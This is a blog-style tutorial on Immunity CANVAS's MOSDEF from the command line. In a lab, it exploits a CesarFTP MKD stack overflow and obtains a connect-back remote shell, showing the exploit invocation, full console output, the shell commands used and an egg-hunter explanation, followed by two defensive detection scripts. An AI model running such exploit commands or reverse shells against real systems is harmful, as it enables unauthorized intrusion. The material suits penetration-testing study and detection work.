Meet MOSDEF!

Those who got to know Metasploit's meterpreter first will naturally assume that Immunity's MOSDEF follows the meterpreter concept; in fact, MOSDEF came first. Metasploit used to be something of a dark horse: an open-source project that could be said to match the capabilities of the commercial products that were already popular at the time, namely Core Impact (~ $30k?) and Immunity CANVAS (~ $1.5k?). Anyone who once used Metasploit's MSFGUI and had also tried CANVAS would even conclude that Metasploit really wanted to follow CANVAS's GUI design.

Metasploit, being open source, was used and tested far more widely and had its features filled in by the worldwide community; in no time it had features like meterpreter, whose scalability is broader than that of CANVAS and Core Impact. And, as the law of nature goes, the global community's research inside Metasploit is of course highly profitable if industry can make good use of it, exactly like the Red Hat story. 2010 marks one year since Metasploit was acquired by Rapid7, and Metasploit Pro has been launched, reportedly priced at up to $15k.

Impressive, isn't it?! Still on the grounds that the Metasploit project will enjoy a mutual symbiosis between community and industry, Metasploit Express and Metasploit Pro now run on the wheels of the world security community's work (for example meterpreter, metasm, library injection, and so on), adding the features the professional security industry needs for penetration testing, such as reporting, pretty charts, a platform for collaboration among team members during a penetration test, and so on. You can see it directly on the official site. Enough about Metasploit :-).

Returning to the title of this post, it is time to discuss the MOSDEF feature of Immunity CANVAS. MOSDEF is very similar to Metasploit; Immunity's vision with CANVAS is to build a GUI-based exploit framework, so for day-to-day use a consultant will usually face a graphical interface. Unless, that is, you come from the part of the security community that is used to spending its time with low-level technology, in which case you will be very interested in seeing how CANVAS runs from the console. Below we will see how MOSDEF is used in the exploitation process in CLI (Command Line Interface) form.

Start MOSDEF Listener


$ ./commandlineInterface.py
[C] Discovered interfaces: [['vmnet1', '172.16.136.1', '255.255.255.0'], ['vmnet8', '172.16.30.1', '255.255.255.0'], ['en1-ipv6', 'fe80::22:68ff:fee7:56de', 'ffff:ffff:ffff:ffff::'], ['en1', '192.168.2.100', '255.255.255.0'], ['lo0-ipv6', 'fe80::::1', 'ffff:ffff:ffff:ffff::'], ['lo0', '127.0.0.1', '255.0.0.0']]
Setting CANVAS session to: default
Using 'Reports/default' as base data output directory
Running command line interface v 1.0
Copyright Immunity, Inc.
If using an MSRPC attack, use the -i fromcreatethread option
Loading osdetect ... [ ok ]
Loading addhost ... [ ok ]
Loading gethostbyname ... [ ok ]
Loading emailsender ... [ ok ]
Loading startservice ... [ ok ]
Loading userenum ... [ ok ]
Loading shareenum ... [ ok ]
[ Thu Oct 21 20:53:22 2010 ]No country exclude list loaded
[ Thu Oct 21 20:53:22 2010 ][*] CANVAS Started [*]
[C] Discovered interfaces: [['vmnet1', '172.16.136.1', '255.255.255.0'], ['vmnet8', '172.16.30.1', '255.255.255.0'], ['en1-ipv6', 'fe80::22:68ff:fee7:56de', 'ffff:ffff:ffff:ffff::'], ['en1', '192.168.2.100', '255.255.255.0'], ['lo0-ipv6', 'fe80::::1', 'ffff:ffff:ffff:ffff::'], ['lo0', '127.0.0.1', '255.0.0.0']]
[ Thu Oct 21 20:53:22 2010 ]Cannot import pyuno - reporting engine can do XML only

Command Line Interface Version 1.0, Immunity, Inc.
usage: commandlineInterface.py -p port -v [-i initstring] [-l localip (for HTTP)]
initstring values:
fromcreatethread (used for MSRPC attacks, for example)

0) WIN32 MOSDEF INTEL
1) WIN32 MODSEF INTEL FromCreateThread
2) WIN64 MOSDEF INTEL
3) LINUX MOSDEF INTEL
4) LINUX EXECVE INTEL
5) HTTP MOSDEF PLAINTEXT
6) HTTP MOSDEF SSL
7) PHP MULTI OS
8) OSX MOSDEF INTEL
9) OSX MOSDEF PPC
10) FREEBSD MOSDEF INTEL
11) SOLARIS MOSDEF SPARC
12) SOLARIS MOSDEF INTEL
13) AIX 5.1 MOSDEF PPC
14) AIX 5.2 MOSDEF PPC
15) JAVA MOSDEF
16) UNIXSHELL
17) Universal MOSDEF
[ Thu Oct 21 20:53:29 2010 ]Newest version available is: 6.63 October 20th, 2010, your version is 6.59 June 21,
2010. You might want to upgrade to a more current version.

MOSDEF needs two consoles (in this example I am using the Mac OS X terminal). In the first console we start the listener that will later serve as the reverse shell once exploitation has taken place. As the listing above shows, several MOSDEF variants are available depending on the target, including MOSDEF for Windows, UNIX, Linux, FreeBSD, and so on. In this example I will use the same target as in the previous post, the CesarFTP server, so the MOSDEF used is WIN32 MOSDEF INTEL.


$ ./commandlineInterface.py -p 31337 -v 0
[C] Discovered interfaces: [['vmnet1', '172.16.136.1', '255.255.255.0'], ['vmnet8', '172.16.30.1', '255.255.255.0'], ['en1-ipv6', 'fe80::22:68ff:fee7:56de', 'ffff:ffff:ffff:ffff::'], ['en1', '192.168.2.100', '255.255.255.0'], ['lo0-ipv6', 'fe80::::1', 'ffff:ffff:ffff:ffff::'], ['lo0', '127.0.0.1', '255.0.0.0']]
Setting CANVAS session to: default
Using 'Reports/default' as base data output directory
Running command line interface v 1.0
Copyright Immunity, Inc.
If using an MSRPC attack, use the -i fromcreatethread option
Loading osdetect ... [ ok ]
Loading addhost ... [ ok ]
Loading gethostbyname ... [ ok ]
Loading emailsender ... [ ok ]
Loading startservice ... [ ok ]
Loading userenum ... [ ok ]
Loading shareenum ... [ ok ]
[ Thu Oct 21 20:54:15 2010 ]No country exclude list loaded
[ Thu Oct 21 20:54:15 2010 ][*] CANVAS Started [*]
[C] Discovered interfaces: [['vmnet1', '172.16.136.1', '255.255.255.0'], ['vmnet8', '172.16.30.1', '255.255.255.0'], ['en1-ipv6', 'fe80::22:68ff:fee7:56de', 'ffff:ffff:ffff:ffff::'], ['en1', '192.168.2.100', '255.255.255.0'], ['lo0-ipv6', 'fe80::::1', 'ffff:ffff:ffff:ffff::'], ['lo0', '127.0.0.1', '255.0.0.0']]
[ Thu Oct 21 20:54:15 2010 ]Cannot import pyuno - reporting engine can do XML only
[C] Discovered interfaces: [['vmnet1', '172.16.136.1', '255.255.255.0'], ['vmnet8', '172.16.30.1', '255.255.255.0'], ['en1-ipv6', 'fe80::22:68ff:fee7:56de', 'ffff:ffff:ffff:ffff::'], ['en1', '192.168.2.100', '255.255.255.0'], ['lo0-ipv6', 'fe80::::1', 'ffff:ffff:ffff:ffff::'], ['lo0', '127.0.0.1', '255.0.0.0']]
Localhost set to 172.16.136.1
[ Thu Oct 21 20:54:15 2010 ]Binding to :31337

Run The Exploit

Once MOSDEF is ready, all that remains is to choose the exploit to run, again from the CLI.


$ ./exploits/cesarftp/cesarftp.py -v 1 -t 192.168.2.101 -p 21 -l 192.168.2.100 -d 31337 -C 5
[C] Discovered interfaces: [['vmnet1', '172.16.136.1', '255.255.255.0'], ['vmnet8', '172.16.30.1', '255.255.255.0'], ['en1-ipv6', 'fe80::22:68ff:fee7:56de', 'ffff:ffff:ffff:ffff::'], ['en1', '192.168.2.100', '255.255.255.0'], ['lo0-ipv6', 'fe80::::1', 'ffff:ffff:ffff:ffff::'], ['lo0', '127.0.0.1', '255.0.0.0']]
Setting CANVAS session to: default
Using 'Reports/default' as base data output directory
Running CANVAS CesarFTP Stack Overflow on MKD command Exploit v 1.0
Loading osdetect ... [ ok ]
Loading addhost ... [ ok ]
Loading gethostbyname ... [ ok ]
Loading emailsender ... [ ok ]
Loading startservice ... [ ok ]
Loading userenum ... [ ok ]
Loading shareenum ... [ ok ]
[ Thu Oct 21 20:58:11 2010 ]No country exclude list loaded
[ Thu Oct 21 20:58:11 2010 ][*] CANVAS Started [*]
[C] Discovered interfaces: [['vmnet1', '172.16.136.1', '255.255.255.0'], ['vmnet8', '172.16.30.1', '255.255.255.0'], ['en1-ipv6', 'fe80::22:68ff:fee7:56de', 'ffff:ffff:ffff:ffff::'], ['en1', '192.168.2.100', '255.255.255.0'], ['lo0-ipv6', 'fe80::::1', 'ffff:ffff:ffff:ffff::'], ['lo0', '127.0.0.1', '255.0.0.0']]
[ Thu Oct 21 20:58:11 2010 ]Cannot import pyuno - reporting engine can do XML only
localhost=192.168.2.100
[ Thu Oct 21 20:58:11 2010 ][C] (192.168.2.101/32) Generating typical Win32 shellcode
[ Thu Oct 21 20:58:12 2010 ][C] (192.168.2.101/32) Raw shellcode (before encoding) is 566 byte
[ Thu Oct 21 20:58:12 2010 ][C] (192.168.2.101/32) Encoding shellcode. This may take a while if we dont find
a good value in the cache.
[ Thu Oct 21 20:58:12 2010 ][C] (192.168.2.101/32) Intel Encoding raw shellcode of length 566
[ Thu Oct 21 20:58:12 2010 ][C] (192.168.2.101/32) Trying additive encoder
Encoding 0x8e words of data in addencoder
[ Thu Oct 21 20:58:18 2010 ]Newest version available is: 6.63 October 20th, 2010, your version is 6.59 June 21,
2010. You might want to upgrade to a more current version.
Error: Did not find split for your shellcode!
[ Thu Oct 21 20:59:20 2010 ][C] (192.168.2.101/32) Using chunked encoder (minimum chunk of 80)
[ Thu Oct 21 20:59:20 2010 ][C] (192.168.2.101/32) Used chunked additive encoder
[ Thu Oct 21 20:59:20 2010 ][C] (192.168.2.101/32) Done encoding shellcode.
[ Thu Oct 21 20:59:20 2010 ][C] (192.168.2.101/32) Tag1: /8,/ Tag2: 6/2.
Searchcode length: 135
[ Thu Oct 21 20:59:20 2010 ][C] (192.168.2.101/32) Intel Encoding raw shellcode of length 135
[ Thu Oct 21 20:59:20 2010 ][C] (192.168.2.101/32) Trying xor encoder
[ Thu Oct 21 20:59:20 2010 ][C] (192.168.2.101/32) Length of search shellcode: 135, length of real shellcode:
671
[ Thu Oct 21 20:59:20 2010 ][C] (192.168.2.101/32) Attacking 192.168.2.101:21
[ Thu Oct 21 20:59:20 2010 ][C] (192.168.2.101/32) Recieved banner: 220 CesarFTP 0.99g Server Welcome !
[ Thu Oct 21 20:59:20 2010 ][C] (192.168.2.101/32) USER command sent (331 User login OK, waiting for password
)
[ Thu Oct 21 20:59:20 2010 ][C] (192.168.2.101/32) PASS command sent (230 User password OK, CesarFTP server ready
)
[ Thu Oct 21 20:59:40 2010 ][C] (192.168.2.101/32) Attack reported no open socket - service died?
[C] Module succeeded!
[C] done -- connectback set to 192.168.2.100:31337

If exploitation goes well, we get a MOSDEF shell in the listener console.


...
[ Thu Oct 21 20:54:15 2010 ]Binding to :31337
[ Thu Oct 21 20:59:20 2010 ]Connected to by ('192.168.2.101', 28455)
[ Thu Oct 21 20:59:20 2010 ]new_node_connection on WIN32 MOSDEF INTEL
[ Thu Oct 21 20:59:20 2010 ]Starting up a WIN32 MOSDEF INTEL Server
XORKEY=4b
[ Thu Oct 21 20:59:20 2010 ]XOR Key set to 0x4b
[ Thu Oct 21 20:59:20 2010 ]Starting up Win32 MOSDEF Node !
[ Thu Oct 21 20:59:20 2010 ]Argsdict = {}
[ Thu Oct 21 20:59:20 2010 ]Getting fd, main functions, and initing main MOSDEF LOOP
[ Thu Oct 21 20:59:21 2010 ]Reading remote fd
[ Thu Oct 21 20:59:21 2010 ]NOTE: If the process stalls here, it is possible you did not set -i fromcreatethread
! It is also possible DEP on XP SP2 or Windows 2003 or Windows Vista has killed the
process
[ Thu Oct 21 20:59:21 2010 ]Self.fd = 00000688
[ Thu Oct 21 20:59:21 2010 ]GetProcAddress=7c80ae40
[ Thu Oct 21 20:59:21 2010 ]LoadLibraryA=7c801d7b
[ Thu Oct 21 20:59:21 2010 ]Send=71ab4c27
[ Thu Oct 21 20:59:21 2010 ]Setting up Win32 dynamic linking assembly component server
XORKEY=4b
[ Thu Oct 21 20:59:21 2010 ]Initialized Local Functions.
[ Thu Oct 21 20:59:21 2010 ]kernel32.dll|GlobalAlloc not in cache - retrieving remotely.
Loadlibrary kernel32.dll = 7c800000
[ Thu Oct 21 20:59:21 2010 ]Found kernel32.dll|GlobalAlloc at 7c80fdcd
[ Thu Oct 21 20:59:21 2010 ]kernel32.dll|GlobalFree not in cache - retrieving remotely.
[ Thu Oct 21 20:59:22 2010 ]Found kernel32.dll|GlobalFree at 7c80fccf
[ Thu Oct 21 20:59:22 2010 ]ws2_32.dll|recv not in cache - retrieving remotely.
Loadlibrary ws2_32.dll = 71ab0000
[ Thu Oct 21 20:59:22 2010 ]Found ws2_32.dll|recv at 71ab676f
[ Thu Oct 21 20:59:22 2010 ]kernel32.dll|GetLocaleInfoA not in cache - retrieving remotely.
[ Thu Oct 21 20:59:23 2010 ]Getprocaddr_withmalloc: Found kernel32.dll|GetLocaleInfoA at 7c80d302
[ Thu Oct 21 20:59:23 2010 ]Calling findInterfaces
[ Thu Oct 21 20:59:23 2010 ]iphlpapi.dll|GetIpAddrTable not in cache - retrieving remotely.
Using loadlibrary_withmalloc! (iphlpapi.dll)
[ Thu Oct 21 20:59:24 2010 ]Loadlibrary iphlpapi.dll = 76d60000
[ Thu Oct 21 20:59:24 2010 ]Getprocaddr_withmalloc: Found iphlpapi.dll|GetIpAddrTable at 76d63b9c
[ Thu Oct 21 20:59:24 2010 ]kernel32.dll|VirtualAlloc not in cache - retrieving remotely.
[ Thu Oct 21 20:59:25 2010 ]Getprocaddr_withmalloc: Found kernel32.dll|VirtualAlloc at 7c809af1
[ Thu Oct 21 20:59:25 2010 ]kernel32.dll|VirtualFree not in cache - retrieving remotely.
[ Thu Oct 21 20:59:25 2010 ]Getprocaddr_withmalloc: Found kernel32.dll|VirtualFree at 7c809b84
[ Thu Oct 21 20:59:25 2010 ]Done with new Node startup.
[ Thu Oct 21 20:59:25 2010 ]10:38 luckily cockroaches have many (and easily detachable) appendages.
They're like a little portable abacus.
Loading startup ... [ ok ]
[ Thu Oct 21 20:59:25 2010 ][C] (127.0.0.1/32) Automatic startup in progress
Loading checkvm ... [ ok ]
[ Thu Oct 21 20:59:25 2010 ][!] Checking if we're inside a VirtualMachine
[ Thu Oct 21 20:59:26 2010 ][!] Looks like we're on virtual hardware :)
[ Thu Oct 21 20:59:26 2010 ][C] (127.0.0.1/32) checkvm -> Host is likely to be a VirtualMachine
[ Thu Oct 21 20:59:26 2010 ]Automatic startup done
[ Thu Oct 21 20:59:26 2010 ]Done handling a new Listener Connection
Letting user interact with server

Win32/MOSDEF$ help

? - Print out useful help messages!
c - Runs a command via popen
chdir - Called by the shellserver to change into a new directory
checkvm - checks if we're inside a VM by checking for a relocated idt
cz - call zero
d - Downloads a file to the session directory e.g. /Reports/default/192.168.1.1/downlaods/file.doc
de - Exit Thread
dodir - Get directory listings from a directory on the remote machine.
dokill - Kills a process identified by pid.
dounlink - Delete a file ("unlink" it) on the remote machine
getpid - No help available
getppid - No help available
h - Print out useful help messages!
help - Print out useful help messages!
id - Not implemented on this shell
mkdir - Makes a directory on the remote machine (ASCII directory names only)
p - calls getcwd()
ps - Print a tree of the process listing. Like the pstree command on Unix.
pt - Prints all valid thread tokens(win32)
quit - Exit the shell entirely
re - Exit the process
reload - Reload a CANVAS module if the code has been changed while CANVAS has been running e.g. reload screengrab
runmodule - When you call "runmodule whoami -O k:8 -O b:9", this is where you end up. args is: whoami -O -k:8 -O b:9 TODO: proper parser on argument string!
seteuid - No help available
shellshock - win32 cmd.exe shellshock, modified from dave's popen2
st - Sets the thread token (0 for reverttoself) thread is actually supposed to be a pointer to a thread... on fail returns 0
tcpscan - TCP Connect scan from the remote host. Args: network to scan, startport, endport
u - Upload a file to the remote host

Win32/MOSDEF$ checkvm
[ Thu Oct 21 21:00:04 2010 ][!] Checking if we're inside a VirtualMachine
[ Thu Oct 21 21:00:04 2010 ][!] Looks like we're on virtual hardware :)
128

Win32/MOSDEF$ shellshock
[ Thu Oct 21 21:00:29 2010 ]kernel32.dll|GetEnvironmentVariableA not in cache - retrieving remotely.
[ Thu Oct 21 21:00:29 2010 ]Getprocaddr_withmalloc: Found kernel32.dll|GetEnvironmentVariableA at 7c814b92
Set cached_comspec to C:\WINDOWS\system32\cmd.exe
[ Thu Oct 21 21:00:30 2010 ]kernel32.dll|CreatePipe not in cache - retrieving remotely.
[ Thu Oct 21 21:00:30 2010 ]Getprocaddr_withmalloc: Found kernel32.dll|CreatePipe at 7c81d83f
[ Thu Oct 21 21:00:30 2010 ]kernel32.dll|GetCurrentProcess not in cache - retrieving remotely.
[ Thu Oct 21 21:00:30 2010 ]Getprocaddr_withmalloc: Found kernel32.dll|GetCurrentProcess at 7c80de95
[ Thu Oct 21 21:00:31 2010 ]kernel32.dll|DuplicateHandle not in cache - retrieving remotely.
[ Thu Oct 21 21:00:31 2010 ]Getprocaddr_withmalloc: Found kernel32.dll|DuplicateHandle at 7c80de9e
[ Thu Oct 21 21:00:32 2010 ]kernel32.dll|CloseHandle not in cache - retrieving remotely.
[ Thu Oct 21 21:00:32 2010 ]Getprocaddr_withmalloc: Found kernel32.dll|CloseHandle at 7c809be7
[ Thu Oct 21 21:00:32 2010 ]kernel32.dll|GetStartupInfoA not in cache - retrieving remotely.
[ Thu Oct 21 21:00:32 2010 ]Getprocaddr_withmalloc: Found kernel32.dll|GetStartupInfoA at 7c801ef2
[ Thu Oct 21 21:00:32 2010 ]kernel32.dll|CreateProcessA not in cache - retrieving remotely.
[ Thu Oct 21 21:00:33 2010 ]Getprocaddr_withmalloc: Found kernel32.dll|CreateProcessA at 7c80236b
[ Thu Oct 21 21:00:33 2010 ]kernel32.dll|ReadFile not in cache - retrieving remotely.
[ Thu Oct 21 21:00:33 2010 ]Getprocaddr_withmalloc: Found kernel32.dll|ReadFile at 7c801812
[ Thu Oct 21 21:00:33 2010 ]kernel32.dll|WriteFile not in cache - retrieving remotely.
[ Thu Oct 21 21:00:33 2010 ]Getprocaddr_withmalloc: Found kernel32.dll|WriteFile at 7c810e27
[ Thu Oct 21 21:00:33 2010 ]kernel32.dll|PeekNamedPipe not in cache - retrieving remotely.
[ Thu Oct 21 21:00:33 2010 ]Getprocaddr_withmalloc: Found kernel32.dll|PeekNamedPipe at 7c860977
[ Thu Oct 21 21:00:33 2010 ]ws2_32.dll|select not in cache - retrieving remotely.
[ Thu Oct 21 21:00:34 2010 ]Getprocaddr_withmalloc: Found ws2_32.dll|select at 71ab30a8
[!] Turning MOSDEF-Node into temporary interactive shell
[!] Note: will revert back to MOSDEF on "exit"
shellshocked!
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\Documents and Settings\mrs\Desktop>dir
dir
Volume in drive C has no label.
Volume Serial Number is 8C23-6511

Directory of C:\Documents and Settings\mrs\Desktop

10/21/2010 05:04 PM .
10/21/2010 05:04 PM ..
04/30/2010 11:03 AM 660 010 Editor v3.lnk
09/28/2010 04:09 AM 630 CesarFTP.lnk
01/26/2010 04:47 PM 575 IDA Pro Advanced (32-bit).lnk
04/22/2009 01:36 PM 1,059 Microsoft Visual Studio 2008.lnk
10/17/2010 04:39 AM 811 NBA 2K10.lnk
10/21/2010 04:59 PM paimei
5 File(s) 3,735 bytes
3 Dir(s) 5,711,056,896 bytes free

C:\Documents and Settings\mrs\Desktop>exit
exit
[!] Cleaning up left over muckery, please remain seated..
[!] Your regular MOSDEF programming will return shortly..

Win32/MOSDEF$ ps
[ Thu Oct 21 21:00:47 2010 ]kernel32.dll|CreateToolhelp32Snapshot not in cache - retrieving remotely.
[ Thu Oct 21 21:00:48 2010 ]Getprocaddr_withmalloc: Found kernel32.dll|CreateToolhelp32Snapshot at 7c865c7f
[ Thu Oct 21 21:00:48 2010 ]kernel32.dll|Process32First not in cache - retrieving remotely.
[ Thu Oct 21 21:00:48 2010 ]Getprocaddr_withmalloc: Found kernel32.dll|Process32First at 7c864f55
[ Thu Oct 21 21:00:48 2010 ]kernel32.dll|Process32Next not in cache - retrieving remotely.
[ Thu Oct 21 21:00:48 2010 ]Getprocaddr_withmalloc: Found kernel32.dll|Process32Next at 7c8650c8
[{'ppid': 0, 'cntThreads': 1, 'exe': '[System Process]', 'pid': 0}, {'ppid': 0, 'cntThreads': 60, 'exe': 'System', 'pid': 4}, {'ppid': 4, 'cntThreads': 3, 'exe': 'smss.exe', 'pid': 564}, {'ppid': 564, 'cntThreads': 12, 'exe': 'csrss.exe', 'pid': 628}, {'ppid': 564, 'cntThreads': 19, 'exe': 'winlogon.exe', 'pid': 652}, {'ppid': 652, 'cntThreads': 16, 'exe': 'services.exe', 'pid': 696}, {'ppid': 652, 'cntThreads': 20, 'exe': 'lsass.exe', 'pid': 708}, {'ppid': 696, 'cntThreads': 1, 'exe': 'vmacthlp.exe', 'pid': 868}, {'ppid': 696, 'cntThreads': 15, 'exe': 'svchost.exe', 'pid': 884}, {'ppid': 696, 'cntThreads': 10, 'exe': 'svchost.exe', 'pid': 960}, {'ppid': 696, 'cntThreads': 67, 'exe': 'svchost.exe', 'pid': 1056}, {'ppid': 696, 'cntThreads': 6, 'exe': 'svchost.exe', 'pid': 1100}, {'ppid': 696, 'cntThreads': 13, 'exe': 'svchost.exe', 'pid': 1168}, {'ppid': 696, 'cntThreads': 10, 'exe': 'spoolsv.exe', 'pid': 1392}, {'ppid': 696, 'cntThreads': 4, 'exe': 'svchost.exe', 'pid': 1536}, {'ppid': 696, 'cntThreads': 5, 'exe': 'jqs.exe', 'pid': 1600}, {'ppid': 696, 'cntThreads': 5, 'exe': 'vmtoolsd.exe', 'pid': 1680}, {'ppid': 696, 'cntThreads': 3, 'exe': 'VMUpgradeHelper.exe', 'pid': 1788}, {'ppid': 696, 'cntThreads': 5, 'exe': 'alg.exe', 'pid': 844}, {'ppid': 1056, 'cntThreads': 1, 'exe': 'wscntfy.exe', 'pid': 1164}, {'ppid': 536, 'cntThreads': 1, 'exe': 'VMwareTray.exe', 'pid': 1580}, {'ppid': 536, 'cntThreads': 7, 'exe': 'VMwareUser.exe', 'pid': 1644}, {'ppid': 536, 'cntThreads': 1, 'exe': 'jusched.exe', 'pid': 832}, {'ppid': 536, 'cntThreads': 3, 'exe': 'Updater.exe', 'pid': 1700}, {'ppid': 536, 'cntThreads': 2, 'exe': 'daemon.exe', 'pid': 388}, {'ppid': 1056, 'cntThreads': 3, 'exe': 'wuauclt.exe', 'pid': 1992}, {'ppid': 696, 'cntThreads': 8, 'exe': 'svchost.exe', 'pid': 2140}, {'ppid': 652, 'cntThreads': 12, 'exe': 'explorer.exe', 'pid': 3512}, {'ppid': 3512, 'cntThreads': 1, 'exe': 'cmd.exe', 'pid': 3200}, {'ppid': 3512, 'cntThreads': 3, 'exe': 'CesarFTP.exe', 'pid': 
3188}, {'ppid': 3188, 'cntThreads': 6, 'exe': 'Server.exe', 'pid': 3916}]
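The `ps` command above prints the process list as a flat list of dicts rather than the tree its help text promises. The following is an added example (not CANVAS code) that rebuilds that tree from the same record format and, from a defender's side, lists every child of a process that should normally have none. The sample records are a subset copied from the output above; the `watched_services` list is an assumption for the example, and whether a given child (such as Server.exe under CesarFTP.exe) is normal for that software has to be baselined on the host.

```python
"""Rebuild a pstree-style view from the list-of-dicts format printed by
MOSDEF's `ps`, and flag children of service processes.

Added example, not part of Immunity CANVAS. SAMPLE_PS is a subset of the
`ps` output shown above; `watched_services` is an assumed, site-specific
list of executables a defender expects never to spawn child processes.
"""
from collections import defaultdict

# Subset of the `ps` output above (pid / ppid / exe / cntThreads).
SAMPLE_PS = [
    {'ppid': 0, 'cntThreads': 1, 'exe': '[System Process]', 'pid': 0},
    {'ppid': 0, 'cntThreads': 60, 'exe': 'System', 'pid': 4},
    {'ppid': 4, 'cntThreads': 3, 'exe': 'smss.exe', 'pid': 564},
    {'ppid': 564, 'cntThreads': 12, 'exe': 'csrss.exe', 'pid': 628},
    {'ppid': 564, 'cntThreads': 19, 'exe': 'winlogon.exe', 'pid': 652},
    {'ppid': 652, 'cntThreads': 16, 'exe': 'services.exe', 'pid': 696},
    {'ppid': 652, 'cntThreads': 20, 'exe': 'lsass.exe', 'pid': 708},
    {'ppid': 696, 'cntThreads': 15, 'exe': 'svchost.exe', 'pid': 884},
    # ppid 536 does not appear in the snapshot: the parent has exited.
    {'ppid': 536, 'cntThreads': 1, 'exe': 'VMwareTray.exe', 'pid': 1580},
    {'ppid': 652, 'cntThreads': 12, 'exe': 'explorer.exe', 'pid': 3512},
    {'ppid': 3512, 'cntThreads': 1, 'exe': 'cmd.exe', 'pid': 3200},
    {'ppid': 3512, 'cntThreads': 3, 'exe': 'CesarFTP.exe', 'pid': 3188},
    {'ppid': 3188, 'cntThreads': 6, 'exe': 'Server.exe', 'pid': 3916},
]


def build_tree(procs):
    """Return (by_pid, children, roots).

    children maps pid -> sorted list of child pids. A process whose parent
    is missing from the snapshot (its parent exited) becomes a root, and a
    process that lists itself as parent (pid 0 above) is a root too rather
    than its own child.
    """
    by_pid = {p['pid']: p for p in procs}
    children = defaultdict(list)
    roots = []
    for p in procs:
        pid, ppid = p['pid'], p['ppid']
        if ppid == pid or ppid not in by_pid:
            roots.append(pid)
        else:
            children[ppid].append(pid)
    for kids in children.values():
        kids.sort()
    return by_pid, children, sorted(roots)


def render_tree(procs):
    """Render the snapshot as indented lines, like pstree on Unix."""
    by_pid, children, roots = build_tree(procs)
    lines = []

    def walk(pid, depth):
        p = by_pid[pid]
        lines.append('  ' * depth + f"{p['exe']} (pid {pid}, {p['cntThreads']} threads)")
        for child in children[pid]:
            walk(child, depth + 1)

    for root in roots:
        walk(root, 0)
    return lines


def children_of_services(procs, watched_services):
    """List (parent_exe, parent_pid, child_exe, child_pid) for each child of
    a process whose exe name is in watched_services (case-insensitive).

    Defender heuristic: a network-facing service normally has no children,
    so any child of one is worth baselining or investigating.
    """
    by_pid, children, _ = build_tree(procs)
    watched = {name.lower() for name in watched_services}
    hits = []
    for pid, proc in by_pid.items():
        if proc['exe'].lower() in watched:
            for child in children[pid]:
                hits.append((proc['exe'], pid, by_pid[child]['exe'], child))
    return hits


if __name__ == '__main__':
    print('\n'.join(render_tree(SAMPLE_PS)))
    for parent, ppid, child, cpid in children_of_services(SAMPLE_PS, ['CesarFTP.exe']):
        print(f'[!] service {parent} (pid {ppid}) has child {child} (pid {cpid})')
```

The same function works on the full list printed above: paste the complete output into `SAMPLE_PS` and the orphaned `ppid: 536` entries simply appear as extra roots.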

Although the main goal of CANVAS's design is an exploit framework that is used graphically, working in console mode like this is still useful. As you can see, the output is very noisy, but those who understand it will appreciate the beauty of CANVAS's step-by-step exploitation process, in which many of its exploits use unique and clever tricks. That is why some exploits against a given machine fail with Metasploit yet get through with CANVAS. Those who enjoy tinkering with frameworks and developing exploits, whether for personal or company needs, can of course pick according to taste: Ruby or Python ;).

If you look closely, you will recognise that this CesarFTP exploitation uses a technique called egg-hunter.


...
[ Thu Oct 21 20:59:20 2010 ][C] (192.168.2.101/32) Using chunked encoder (minimum chunk of 80)
[ Thu Oct 21 20:59:20 2010 ][C] (192.168.2.101/32) Used chunked additive encoder
[ Thu Oct 21 20:59:20 2010 ][C] (192.168.2.101/32) Done encoding shellcode.
[ Thu Oct 21 20:59:20 2010 ][C] (192.168.2.101/32) Tag1: /8,/ Tag2: 6/2.
Searchcode length: 135
[ Thu Oct 21 20:59:20 2010 ][C] (192.168.2.101/32) Intel Encoding raw shellcode of length 135
[ Thu Oct 21 20:59:20 2010 ][C] (192.168.2.101/32) Trying xor encoder
[ Thu Oct 21 20:59:20 2010 ][C] (192.168.2.101/32) Length of search shellcode: 135, length of real shellcode:
671
...

For those who remember the previous post, CesarFTP limits the amount of payload that fits on the stack, and the skypher payload used there happened to be small enough. In the CANVAS payload above, bringing up MOSDEF actually requires a real shellcode of 671 bytes, but with the egg-hunter technique that real shellcode is executed as stage 2. The stage-1 shellcode is only 135 bytes; its job is to locate the real shellcode in memory and hand the processor's execution flow over to it cleanly.
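The staged payload above still has to reach the server inside the argument of an FTP command (the module name calls this a stack overflow on MKD), so on the wire it looks like a directory name that is hundreds of bytes long and, once encoded, often contains non-printable bytes. The following is an added example from the detection side, not CANVAS or CesarFTP code: it parses client lines from an FTP control channel and flags commands whose argument is longer than a per-command ceiling or contains non-printable bytes. The ceilings and the sample session are constructed for the example; the oversized MKD line is filler bytes standing in for a payload, not real shellcode.

```python
"""Flag oversized or binary-looking commands on an FTP control channel.

Added example, not CANVAS or CesarFTP code. Assumes a capture of the
client side of the control connection, one command per line. The
argument-length ceilings and SAMPLE_SESSION are constructed values.
"""
import re

# Assumed per-command ceilings for this example (not RFC or CesarFTP limits).
MAX_ARG_LEN = {'MKD': 256, 'CWD': 256, 'USER': 64, 'PASS': 128}
DEFAULT_MAX_ARG_LEN = 512

# verb of 3-4 letters, optionally followed by a space and an argument.
CMD_RE = re.compile(rb'^([A-Za-z]{3,4})(?: (.*))?$', re.DOTALL)


def parse_command(line):
    """Split one client line into (VERB, argument bytes).

    Returns None when the line is not a well-formed FTP command.
    """
    m = CMD_RE.match(line.rstrip(b'\r\n'))
    if not m:
        return None
    return m.group(1).upper().decode('ascii'), m.group(2) or b''


def is_binary(arg):
    """True if the argument contains bytes outside printable ASCII."""
    return any(b < 0x20 or b > 0x7e for b in arg)


def scan_commands(lines):
    """Return findings as (line_no, verb, arg_len, reasons) tuples."""
    findings = []
    for no, line in enumerate(lines, 1):
        parsed = parse_command(line)
        if parsed is None:
            findings.append((no, None, len(line), ['malformed command']))
            continue
        verb, arg = parsed
        reasons = []
        limit = MAX_ARG_LEN.get(verb, DEFAULT_MAX_ARG_LEN)
        if len(arg) > limit:
            reasons.append(f'argument {len(arg)} > {limit}')
        if is_binary(arg):
            reasons.append('non-printable bytes in argument')
        if reasons:
            findings.append((no, verb, len(arg), reasons))
    return findings


# Constructed sample: a normal login and directory creation, then an MKD
# whose argument is far longer than any real directory name and carries
# non-printable bytes (filler standing in for an encoded payload).
SAMPLE_SESSION = [
    b'USER anonymous\r\n',
    b'PASS guest@example.invalid\r\n',
    b'MKD uploads\r\n',
    b'MKD ' + b'A' * 671 + b'\x90\x90\xcc' + b'\r\n',
]

if __name__ == '__main__':
    for no, verb, n, reasons in scan_commands(SAMPLE_SESSION):
        print(f'line {no}: {verb} arg_len={n}: {"; ".join(reasons)}')
```

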